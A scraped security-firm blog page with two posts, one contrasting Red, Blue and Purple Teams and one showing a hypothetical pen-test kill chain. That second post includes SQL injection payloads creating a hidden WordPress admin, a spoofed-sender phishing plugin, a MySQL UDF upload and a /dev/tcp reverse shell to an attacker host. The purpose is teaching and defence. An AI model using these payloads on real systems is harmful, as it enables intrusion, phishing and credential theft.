[2] https://www.rfc-editor.org/rfc/rfc3240

[3] https://dicom.nema.org/medical/dicom/current/output/html/part15.html

[4] https://github.com/DCMTK/dcmtk

[5] https://gitlab.com/akihe/radamsa

[6] https://github.com/aflnet/aflnet

[7] https://github.com/google/AFL

[8] https://github.com/aflnet/aflnet

[9] https://thuanpv.github.io/publications/AFLNet_ICST20.pdf

[10] https://www.orthanc-server.com/

[11] https://www.tcpdump.org/

INSIGHTS | March 24, 2025

Red vs Purple Team, what’s the difference?

Learn the key differences between Red and Purple Teams. Explore their unique roles, strategies, and how they collaborate to strengthen an organization’s defenses against cyber threats.

As cyber threats continue to escalate in complexity and scale, researchers and threat intelligence analysts have become experts in the tactics, techniques, and procedures (TTPs) employed by today’s cybercriminals.

To effectively combat them, they have also learned to think like them.

Purely defensive security measures are no longer adequate in building solid defenses for blocking modern-day threats. Instead, we must combine research, a thorough knowledge of real-world attack techniques, and an attacker’s perspective to conduct realistic risk and security assessments.

Red Team and Purple Teams bridge the gap between offensive and defensive security approaches. These engagements go beyond traditional penetration testing and are crucial for organizations intent on improving their security hygiene and cyberattack readiness.

In this article, we will explore the roles Red Team and Purple Team members play and how they come together to develop resilient security strategies suitable for organizations today.

Enter the Red Team: Ethical, Offensive Security

An organization’s defenders and in-house security staff, known as a Blue Team, are the ones who must remain vigilant against cyberattacks. The Blue Team is tasked with building, strengthening, and repairing the barriers and digital walls protecting an organization’s assets, including intellectual property and data.

But what if there are weaknesses in these walls that they are unaware of, or entry points they can’t see?

Enter the Red Team: a group of ethical hackers tasked with thinking like genuine intruders. Within in-scope networks and systems, they map, plot, and test pathways that will allow them to avoid existing protective measures to access resources and data, and to move laterally across networks.

Armed with the TTPs of threat actors and expert knowledge of threat groups and attack trends, Red Teams conduct engagements to test everything from network endpoints to employee security awareness. With their assessment structured through threat modeling and scope agreements, Red Teams may exploit unpatched vulnerabilities to infiltrate a network and perform reconnaissance, or use social engineering or leaked credentials to probe existing access controls – whether physical or digital – to find the same weaknesses cybercriminals are looking for.

Before a campaign begins, Red Teams will plan their engagement based on black-, gray-, or white-box approaches, in which they either will not have any privileged information, some limited information, or full system and security control data, respectively, depending on their clients’ wishes.

The aim of a Red Team isn’t to steal or destroy, but rather to unmask vulnerabilities by probing an organization’s defenses, simulating how real-world attackers may think and act, and to see how defenders, or the Blue Team, respond.

Purple Teams: When Collaboration is Key

The role of the Red Team doesn’t end with an assessment of an organization’s security posture. When a Red Team is hired, it is not a case of pitting adversarial Red Team attackers against a defending Blue Team and seeing who wins the game. It’s not about competition: the goal is collaboration.

Purple Teams are formed of Red Team and Blue Team members. By bringing these team members together, defenders can better understand the attacker’s mindset and real-world risks to the assets they are tasked with protecting.

Purple Team engagements go far, far beyond CVE ratings, patch schedules, and setting up basic access security controls; they allow cybersecurity and IT specialists to determine the right defensive strategies and resource allocations for their organization.

How is a Purple Team Different From a Blue Team?

Blue Teams are in-house specialists who focus on the detection and prevention of cyberattacks. They are responsible for investigating and triaging suspicious activity, including managing many of the security controls they rely on for detection, such as EDR tools, email filters, and intrusion detection systems.

The responsibilities of Purple Teams are more focused, and their activities are based on an attack path developed collaboratively using threat intelligence and knowledge of the existing network and security controls. A Purple Team proactively bridges the gap between offensive and defensive security, bringing Red Team attackers and Blue Team defenders together. They collaborate throughout the engagement to ensure full visibility of the Red Team’s activities throughout each step of the attack kill chain. Steps are repeated as needed to validate whether the Blue Team can prevent, or at the very least, log and detect the actions.

Red Teams ethically attack. Blue Teams detect and defend. Purple Teams, formed out of cooperation and a collaborative mindset, focus on sharing information and expertise to improve the target organization’s security posture.

Purple Teams: Attack and Defense Simulations

Unlike traditional penetration tests, Purple Team exercises build a narrative that combines the information and vulnerability discovery data gathered by the Red Team, with the Blue Team’s understanding of their organization’s existing security controls. 

This narrative may include attack and defense simulations and reproducing the attack paths that the Red Team was able to develop. Furthermore, Purple Team exercises include “assumed breach” scenarios and tabletop exercises designed to highlight the true impact of a breach, as well as the most appropriate ways to combat them.

The Red and Purple Teams comprehensively document their engagements, giving clients an in-depth understanding of their security controls and cyberattack resilience. Each report is driven by research and data, with the attack narrative mapped to the MITRE ATT&CK framework.

Red and Purple Teams: Specialized Skill Sets With the Same Objective

As cyberattacks and those performing them are incredibly diverse, organizations benefit the most from Red Team and Purple Team engagements when participating members offer just as much variety in skill and experience. Different backgrounds, knowledge, and training all provide unique perspectives and approaches to vulnerability discovery, problem-solving, and risk.

Red Team members are focused on offensive security and adversarial methods. You will often find that these specialists hold certifications that include OSCP, GPEN, PenTest+, GXPN, OSWP, and BSCP. Additionally, expect to find expertise in systems administration, coding, incident response, social engineering, and physical access breach methods.

Comparatively, Blue Team members focus on defensive specializations. As such, their range of certifications is more diverse and may include Security+, GSEC, CISSP, GCIH, CSA, CTIA, CySA+, CCSP, and product-specific certifications or training.

How IOActive Can Assist You

By adopting the attacker’s mindset, IOActive’s Red Team specialists go beyond traditional penetration testing services, utilizing modern threat actor techniques to provide clients with a comprehensive overview of real-world risks and attack vectors.

Our work doesn’t stop there. By working collaboratively with Blue Team defenders, Purple Team engagements promote the exchange of knowledge, skills, and perspectives necessary to develop realistic risk assessments and robust security strategies.

With our help, organizations can equip themselves to meet the challenge of modern cyber threats, improving the effectiveness of their security controls, resiliency, and incident response procedures.

Learn more about IOActive’s Red and Purple Team Services.

Are you uncertain on whether you really need a Red Team service? Find out the 5 signs you’re ready for a Red Team engagement.

INSIGHTS | March 17, 2025

Pen Test Like a Red Teamer – Beyond the Checklist

Penetration tests (“pen tests”) are a key element of every organization’s security process. They provide insights into the security posture of applications, environments, and critical resources. Such testing often follows a well-known process: enumerate the scope, run automated scans, check for common vulnerabilities within the CWE Top 25 or OWASP Top 10, and deliver a templated report. Even though this “checklist” approach can uncover issues, it can lack the depth and creativity needed to emulate a genuine cyber threat scenario. This is where the Red Team mindset comes in.

A Red Team simulates realistic adversaries by using advanced tactics, techniques, and procedures (TTPs). Rather than sticking to a mechanical checklist, Red Teamers think like real attackers, aiming to achieve specific goals, such as data exfiltration, domain takeover, or access to a critical system. This approach doesn’t just identify vulnerabilities; it explores the full path an attacker might take, chaining vulnerabilities together (mapped with frameworks like MITRE ATT&CK) until a more damaging outcome is achieved. It gives an organization a better understanding of its cybersecurity situation and how seriously an attacker could impact its in-scope assets.

Why Think Like a Red Teamer?

Traditional pen testing often ends the moment a vulnerability like SQL injection (SQLi) is discovered and confirmed. The pen tester lists the SQLi vulnerability in the report, explains its impact, provides a Proof of Concept (POC), and presents remediation tips. A Red Teamer, however, goes further: What can be achieved if I chain that SQLi with something else? Can I steal credentials or extract sensitive data from the database? Could I continue to exploit this to achieve remote code execution (RCE)? If I gain RCE, can I pivot from this compromised server to other internal systems? By tracing the entire “kill chain,” Red Teams uncover critical paths that a real-world attacker would exploit, since the goal is to show the complete impact—and this is just one example.

Checking the boxes for vulnerabilities like cross-site scripting (XSS), insecure direct object references (IDOR), and missing HTTP security headers is still important and relevant in this approach to testing, because it provides a baseline of known issues; however, adding a Red Team-style approach to evaluate how seemingly smaller vulnerabilities might chain together is what ensures a more realistic security assessment. Think of it like a live fire drill: you learn a lot more about your readiness when you run the scenario as if it’s happening in real life, rather than just checking if your fire extinguisher is regularly maintained.

Collaborating with the Client

One key difference between a typical pen test and a Red Team exercise is the level of coordination required. A Red Team engagement typically involves continuous collaboration with the client because certain vulnerabilities might cause system outages or a significant data breach. Some clients may not allow the tester to fully exploit certain vulnerabilities once discovered. For instance, if the pen tester finds a critical bug that could lead to data corruption, the client may prefer not to have their production environment impacted. For these tasks, it is better to use UAT environments that are almost identical to production so that no outages occur.

Some scoping calls and planning might be required to give the client the best possible result. The tester should sit down (virtually or in person) with the client to determine the primary objectives of the exercise. For example, are they primarily concerned about data exfiltration, privilege escalation, or compromise of internal resources? This helps the tester align their goals with the client’s highest priorities. Also, rather than waiting until the end of the engagement to share all findings, Red Teams often disclose highly intrusive tests and high-risk vulnerabilities throughout the process. This allows the client’s security teams to approve the tests and observe how an attacker might operate within their environments.

Technical Depth: From SQLi to Full Compromise

Adopting a Red Team mindset doesn’t mean ignoring standard vulnerability checks—those are still crucial. What changes is how you leverage them. Let’s explore a hypothetical path using MITRE ATT&CK techniques:

Hypothetical path using MITRE ATT&CK techniques

1. Discovery

Technique: Exploit Public-facing Application (T1190)

The attacker identifies a parameter in a web application that is vulnerable to SQL injection:

http://vulnerable-website.com/search?query=' OR 1=1--

Typically, this is where a standard pen testing approach might end: “Parameter X is vulnerable to SQLi. Here’s how to fix it.” However, a Red Team approach seeks further exploitation paths.
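The mechanics of that tautology payload can be reproduced in miniature with Python's built-in sqlite3 module. The table, data, and search function below are invented for illustration; the real target's backend and schema are unknown:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE products (name TEXT, secret INTEGER)")
conn.executemany("INSERT INTO products VALUES (?, ?)",
                 [("public widget", 0), ("internal prototype", 1)])

def search(query):
    # Vulnerable pattern: user input is concatenated straight into the SQL
    # string, mirroring the ?query= parameter in the URL above.
    sql = f"SELECT name FROM products WHERE secret = 0 AND name = '{query}'"
    return [row[0] for row in conn.execute(sql)]

print(search("public widget"))   # → ['public widget']
print(search("' OR 1=1--"))      # → ['public widget', 'internal prototype']
```

The injected quote closes the string literal early and `--` comments out the rest of the statement, so the `OR 1=1` clause matches every row, leaking records the query was never meant to return.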

2. Chaining Attacks

i. WordPress-to-Phishing

Techniques: Exploit Public-Facing Application (T1190) & Phishing (T1566.003 – Spearphishing via Service)

Using the SQL injection vulnerability, the attacker enumerates the database and discovers that it is shared with a WordPress installation. With this insight, the attacker injects payloads to create a new administrative user within WordPress:

'; INSERT INTO wp_users (user_login, user_pass, user_email, user_registered, user_status, display_name)
VALUES ('evil_admin', MD5('P@ssw0rd'), 'evil@attacker.com', NOW(), 0, 'evil_admin'); --

'; INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES ((SELECT ID FROM wp_users WHERE user_login='evil_admin'), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); --
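The wp_capabilities value above is a PHP-serialized array, and the s:13 length prefix must match the key's length exactly or WordPress will ignore the capability. The small helper below is purely illustrative (not part of any real tooling) and rebuilds that string for a map of capability flags:

```python
def php_serialize_bool_map(d):
    """Serialize a {str: bool} mapping the way PHP's serialize() renders an
    associative array of booleans, e.g. WordPress capability maps."""
    parts = [f'a:{len(d)}:{{']
    for key, value in d.items():
        # s:<byte length>:"<key>"; then b:1 or b:0 for the boolean value.
        parts.append(f's:{len(key)}:"{key}";b:{1 if value else 0};')
    parts.append('}')
    return ''.join(parts)

print(php_serialize_bool_map({"administrator": True}))
# → a:1:{s:13:"administrator";b:1;}
```

This matches the literal embedded in the wp_usermeta payload, which is why the injected user is granted full administrator rights.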

After logging in as admin, the attacker discovers a plugin that sends emails using the company’s official address (info@company.com), and uploads a custom plugin to send phishing emails.

For example:

<?php
/*
Plugin Name: Phishing Mailer
Description: Custom plugin to send phishing emails.
Version: 1.0
Author: Attacker
*/
function send_phishing_email() {
    $to = "victim@target.com";
    $subject = "Urgent: Account Verification Needed";
    $message = "Please verify your account at: http://attacker-website.com/phishing";
    $headers = "From: info@company.com";
    wp_mail($to, $subject, $message, $headers);
}
add_action('init', 'send_phishing_email');
?>

When activated, this plugin sends phishing emails that appear to come from the legitimate company address, which could give the attacker internal access.

ii. Remote Code Execution

Techniques: Web Shell (T1505.003) & Command and Scripting Interpreter (T1059)

Building on the SQLi foothold, the attacker compiles a malicious MySQL user-defined function (UDF) payload as a Linux shared object (udf_payload.so) and converts it into a single hex-encoded string. For demonstration, the command below shows a truncated version of that string:

'; SELECT 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000... 
INTO DUMPFILE '/usr/lib/mysql/plugin/udf_payload.so'; --

With the payload written to disk, the attacker registers a new UDF that executes system commands:

'; DROP FUNCTION IF EXISTS sys_exec;
CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf_payload.so'; --

Now the attacker can spawn a reverse shell back to their own system:

select sys_exec('bash -i >& /dev/tcp/attacker-server-ip/443 0>&1');

3. Privilege Escalation

Technique: Unsecured Credentials (T1552)

Now with remote code execution obtained in the previous step, the attacker searches for higher-privilege credentials. By dumping OS-level credentials and inspecting configuration files, the attacker uncovers sensitive information such as SSH keys or passwords:

# cat /etc/my.conf
# ls -la /users/user/.ssh/

These findings enable further escalation within the compromised environment.

4. Lateral Movement

Technique: Remote Services (T1021)

Using the extracted SSH key, the attacker pivots to an internal backend server:

ssh -i key user@backend-server-ip

Upon accessing the backend server, the attacker discovers that the API source code is stored in a Git repository. By reviewing the repository’s commit history with a tool like TruffleHog, the attacker uncovers additional leaked credentials, expanding their control over the environment:

[/opt/api] # trufflehog .

5. Objective Attainment

This scan reveals previously committed AWS keys, which the attacker then uses to access additional AWS resources and further compromise the target’s infrastructure.
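As a rough illustration of what such a secrets scan does under the hood (TruffleHog itself uses many detectors plus entropy checks), here is a minimal regex-based sketch for AWS access key IDs; the diff content below is fabricated sample data:

```python
import re

# AWS access key IDs have a fixed shape: a four-letter prefix such as
# AKIA (long-term) or ASIA (temporary) followed by 16 uppercase
# alphanumeric characters.
AWS_KEY_RE = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")

def scan_text(text):
    """Return candidate AWS access key IDs found in a blob of text."""
    return AWS_KEY_RE.findall(text)

# Fabricated commit diff standing in for real repository history.
diff = """
+ AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
+ AWS_SECRET_ACCESS_KEY = "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
"""
print(scan_text(diff))
# → ['AKIAIOSFODNN7EXAMPLE']
```

The secret access key itself has no reliable prefix, which is why real scanners pair patterns like this with entropy analysis and verification against the provider's API.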

Using these steps, the attacker gains remote code execution access to two servers, control over AWS resources, and an internal foothold with the phishing plugin.

MITRE ATT&CK Mapping Overview

The following table shows how each stage of the attack aligns with specific MITRE ATT&CK techniques. It highlights the tactics, techniques, and procedures (TTPs) leveraged by the attacker to progress from initial discovery to achieving their final objectives.

Phase | Technique Description | MITRE ATT&CK ID
------|-----------------------|----------------
Discovery | Exploit Public-Facing Application via SQL Injection | T1190
WordPress Exploitation & Phishing | SQL injection to create admin user and phishing via service | T1190, T1566.003
Remote Code Execution | Deploy web shell and register UDF for command execution | T1505.003, T1059
Privilege Escalation | Dump OS credentials from unsecured configuration files | T1552
Lateral Movement | Pivot using SSH access to internal systems | T1021
Objective Attainment | Use compromised AWS keys to access cloud services | T1078.004

By connecting each vulnerability in a realistic kill chain, clients can clearly see how a single oversight can translate into a major breach. This applies to other types of tests, not just web applications:

  • IoT Devices
    IoT devices, such as smart cameras or industrial control sensors, often have default credentials or unencrypted communications. A Red Teamer might discover a way to intercept and tamper with device firmware, leading to data theft or even physical consequences. For instance, obtaining a hardcoded password and accessing other devices over the MQTT broker could allow control of the devices or extraction of sensitive information, such as screenshots from a camera.
  • Mobile Apps
    Consider a shopping app where developers left critical business logic in plain sight within the client code, including promotional algorithms and discount threshold checks. A Red Teamer could reverse engineer the APK, analyze function calls, and discover ways to unlock secret promotional rates. By manipulating the client’s code, they could grant themselves unlimited discounts and bypass purchase limits.
  • Cloud Environments
    With the growing popularity of AWS, Azure, and GCP, Red Teamers often focus on misconfigurations in IAM policies, exposed S3 buckets, or vulnerable serverless functions. Exploiting these issues can cascade through an entire environment, demonstrating how a single bucket misconfiguration can lead to a breach of confidential data or internal systems.

Benefits to Both Sides

1.) Client Value

  • Deeper Insights: The client sees the full potential attack chain, not just a list of vulnerabilities.
  • Tailored Remediations: Knowing exactly how an attacker could pivot and escalate privileges allows for more targeted, effective solutions.
  • Realistic Training: Security teams get hands-on experience defending against a simulated adversary.

2.) Pen Tester Satisfaction

  • Deeper Engagement: Rather than just running a routine checklist, you get to dive deep into a system.
  • Continuous Learning: You’re more likely to discover new TTPs and refine your tradecraft when you think like an attacker.
  • Professional Growth: Real-world exploitation scenarios build credibility, demonstrating advanced skill sets to future clients or employers.

Pen Testing Like a Red Teamer vs. a Red Team Exercise

Bringing a Red Team mindset to pen testing can add value, but it’s important to understand that pen testing like a Red Teamer and running a full Red Team operation are two very different things.

A Red Team exercise is a large-scale, long-term simulation of a real-world adversary. It goes beyond just testing technical vulnerabilities—it includes tactics like phishing, physical intrusion, lockpicking, badge cloning, and covert operations to evaluate an organization’s security as a whole. These engagements can span weeks or even months and require detailed planning, stealth, and coordination.

On the other hand, pen testing like a Red Teamer operates within the structured limits of a pen test. It’s more than just running scans or checking boxes—it involves chaining vulnerabilities, escalating privileges, and digging deeper into potential attack paths; however, it does not include elements like social engineering, physical security breaches, or advanced persistent threat (APT) simulations. Once those come into play, the engagement moves into full Red Team territory, which requires more resources, extended timelines, and different contractual agreements.

Final Thoughts

Adopting a Red Team mindset in pen testing elevates the process from just identifying vulnerabilities to understanding their full impact. Instead of just reporting security flaws, you’re simulating how an attacker could exploit them, giving clients a clearer picture of their real-world risks. This benefits everyone—the client gets a richer security assessment, and testers get more engaging, hands-on experience, refining their skills.

That said, a Red Team approach requires trust and clear communication. Before diving in, both the tester and the client need to define the scope, objectives, and acceptable levels of risk. Whether you’re assessing a web application, a mobile platform, or an IoT ecosystem, thinking like a Red Teamer makes your testing more impactful, providing clients with insights they can actually use to strengthen their defenses.

While it’s important to push the boundaries in pen testing and expose realistic attack paths, it’s just as crucial to recognize that true Red Teaming is a different service. It comes with different expectations, methodologies, and permissions. Keeping that distinction clear ensures ethical testing, aligns with client needs, and maximizes value for both offensive and defensive teams.

At the end of the day, the best pen tests don’t just list vulnerabilities—they show how those weaknesses can be exploited to achieve real-world attack objectives. By embracing this mindset, you’ll conduct more meaningful tests, build stronger client relationships, and contribute to a more secure digital world.